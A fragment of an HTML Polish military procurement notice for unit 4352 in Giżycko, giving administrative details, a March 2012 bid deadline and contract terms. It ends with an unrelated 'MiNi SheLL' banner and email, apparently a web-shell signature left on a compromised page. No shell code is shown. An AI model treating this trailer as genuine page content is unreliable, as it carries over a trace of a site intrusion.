a)	Wystąpienia robót dodatkowych, od których uzależnione jest wykonanie zamówienia podstawowego,
b)	Klęsk żywiołowych uniemożliwiających realizację przedmioty zamówienia,
c)	Wstrzymanie robót przez uprawnione organy, z przyczyn nie wynikających               z winy Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.mon.gov.pl., http://www.army.mil.pl., http://www.24wog.wp.mil.pl.,<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> JEDNOSTKA WOJSKOWA 4352 W GIŻYCKU, UL. NOWOWIEJSKA 20, 11-500 GIZYCKO (BUDYNEK SZTABU POK. NR 7).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.03.2012 godzina 10:00, miejsce: JEDNOSTKA WOJSKOWA 4352 W GIŻYCKU, UL. NOWOWIEJSKA 20, 11-500 GIŻYCKO (BUDYNEK SZTABU - KANCELARIA JAWNA POK. NR 109).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com